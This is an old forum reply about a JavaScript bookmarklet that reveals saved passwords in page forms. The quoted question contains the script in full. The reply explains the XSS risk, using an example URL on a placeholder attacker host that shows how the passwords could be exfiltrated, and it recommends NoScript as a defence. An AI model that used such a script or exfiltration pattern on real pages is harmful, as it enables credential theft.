|
Posted by Todd H. on March 2, 2008, 12:30 pm
If you were Registered and logged in, you could reply and use other advanced thread options
matthewslaney@gmail.com writes:
> Hi,
>
> I recently learned of the "exploit" where you can run a javascript
> command to view saved passwords that are hidden. This code:
>
> javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms;
> for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if
> (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if
> (s) alert("Passwords in forms on this page:\n\n" + s); else
> alert("There are no passwords in forms on this page.");})();
>
> I was wondering if there was any way to protect against this?
>
> Please refrain from stating the obvious, "don't save your passwords".
> There are a couple of sites I use frequently and don't care about
> security too much, but don't want my passwords to disappear.
This code is a good example of why cross-site scripting (XSS)
vulnerabilities are a big deal, and why you don't want untrusted third
party javascript running in the security context of another domain's
page. That code can be trivially modified to load a blank images
from an attacker's site with arguments attached that send those
passwords to that site's log file (e.g. loading
badguy.com/blank.jpg?password1=blah&password2=foo)
To protect against this on the client end, turning off javascript
(made more manageable by the Firefox NoScript plugin as suggested by
another user) is probably the most realistic countermeasure.
There are other risks associated with auto populating passwords in
pages, and like any other security issue, you have to make the balance
of convenience and security that's right for you.
Best Regards,
--
Todd H.
http://www.toddh.net/
| 
XML site map